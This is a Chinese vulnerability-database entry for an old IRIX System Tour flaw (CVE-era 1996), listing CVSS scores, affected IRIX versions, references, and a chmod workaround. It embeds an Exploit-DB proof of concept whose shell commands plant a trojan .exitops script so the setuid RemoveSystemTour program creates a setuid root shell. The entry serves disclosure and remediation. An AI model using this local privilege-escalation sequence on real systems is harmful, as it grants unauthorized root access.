发布时间 :1996-10-30 00:00:00
修订时间 :2016-10-17 22:03:53

[原文]Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 allows local users to gain root privileges via a Trojan horse .exitops program, which is called by the inst command that is executed by the RemoveSystemTour program.

[CNNVD]IRIX SGI系统tour数据包(systour) Indigo Magic System Tour权限许可和访问控制漏洞(CNNVD-199610-009)

        IRIX 5.x至6.3版本的SGI系统tour数据包(systour)中的Indigo Magic System Tour存在漏洞。本地用户可以借助一个Trojan horse .exitops程序获取根权限,该程序由RemoveSystemTour程序执行的inst命令请求运行。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.1SGI IRIX 6.1
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:6.0.1::xfsSGI IRIX 6.0.1 XFS
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:6.0SGI IRIX 6.0
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:5.3::xfsSGI IRIX 5.3 XFS

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  SGI  19961101-01-I
(UNKNOWN)  BUGTRAQ  19961030 (Another) vulnerability in new SGIs
(UNKNOWN)  XF  irix-systour(7456)

- 漏洞信息

IRIX SGI系统tour数据包(systour) Indigo Magic System Tour权限许可和访问控制漏洞
高危 未知
1996-10-30 00:00:00 2005-05-02 00:00:00
        IRIX 5.x至6.3版本的SGI系统tour数据包(systour)中的Indigo Magic System Tour存在漏洞。本地用户可以借助一个Trojan horse .exitops程序获取根权限,该程序由RemoveSystemTour程序执行的inst命令请求运行。

- 公告与补丁


- 漏洞信息 (19356)

SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities (EDBID:19356)
irix local
1996-10-30 Verified
0 Tun-Hui Hu
N/A [点击下载]

A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. 

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution. 		

- 漏洞信息

IRIX RemoveSystemTour .exitops Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.

- 时间线

1996-10-30 Unknow
1996-10-30 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: #/bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour #/bin/chmod u-s /usr/people/tour/oob/bin/oobversions

- 相关参考

- 漏洞作者